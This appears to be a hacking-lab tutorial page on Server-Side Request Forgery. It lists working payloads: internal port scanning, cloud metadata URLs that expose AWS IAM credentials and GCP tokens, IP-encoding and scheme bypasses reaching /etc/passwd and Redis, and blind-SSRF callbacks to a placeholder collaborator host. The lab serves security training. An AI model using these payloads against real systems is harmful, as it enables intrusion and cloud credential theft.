๐ŸŽฏ Lab Objectives

  • Understand SSRF fundamentals and real-world impact
  • Exploit basic SSRF to reach internal services
  • Bypass SSRF filters (IP blacklists, URL validation)
  • Access AWS/GCP instance metadata via SSRF
  • Detect blind SSRF with out-of-band callbacks
  • Chain SSRF with Redis/Memcached for RCE via Gopher protocol

Topics Covered

  • SSRF basics โ€” what the server fetches on your behalf
  • Port scanning internal networks via SSRF
  • Cloud metadata (169.254.169.254) exploitation
  • Blind SSRF with Burp Collaborator and interactsh
  • SSRF bypass: decimal IPs, IPv6, DNS rebinding
  • SSRF to RCE via Redis and Gopher protocol

What is SSRF?

Server-Side Request Forgery (SSRF) occurs when you can make the server issue HTTP requests to destinations you specify. The server fetches the URL you provide โ€” giving you access to services only reachable from the server itself: internal APIs, admin panels, cloud metadata endpoints, and local services that reject external connections.

Basic Exploitation

# The vulnerable parameter:
GET /api/fetch?url=https://external.com HTTP/1.1

# Redirect it at internal services:
GET /api/fetch?url=http://localhost:8080/admin
GET /api/fetch?url=http://192.168.1.1/
GET /api/fetch?url=http://10.0.0.1:6379/  # Redis

# Port scan the internal network
for port in 22 80 443 6379 5432 3306 8080 8443; do
  curl "https://vuln.site/fetch?url=http://192.168.1.100:$port" 2>&1
done

Cloud Metadata Exploitation

# AWS IMDSv1 โ€” highest value target
GET /fetch?url=http://169.254.169.254/latest/meta-data/
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

# GCP Metadata
GET /fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure IMDS
GET /fetch?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01

Bypass Techniques

# Bypass blacklist of 127.0.0.1
http://2130706433/          # decimal encoding
http://0x7f000001/          # hexadecimal encoding
http://[::1]/               # IPv6 localhost
http://127.1/               # shorthand notation

# Bypass http:// scheme filter
dict://127.0.0.1:6379/INFO   # Redis via dict protocol
gopher://127.0.0.1:6379/_INFO  # Redis via Gopher protocol
file:///etc/passwd           # file:// protocol

Blind SSRF Detection

# Use Burp Collaborator or interactsh for out-of-band callbacks
GET /fetch?url=https://YOUR.burpcollaborator.net/ssrf-test

# Open-source interactsh
interactsh-client -v
# Use your generated .interact.sh subdomain as the callback URL
โœ…
Lab Complete! Mark it done below and continue your learning path.
โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands
๐Ÿ“–
Sign in to track progress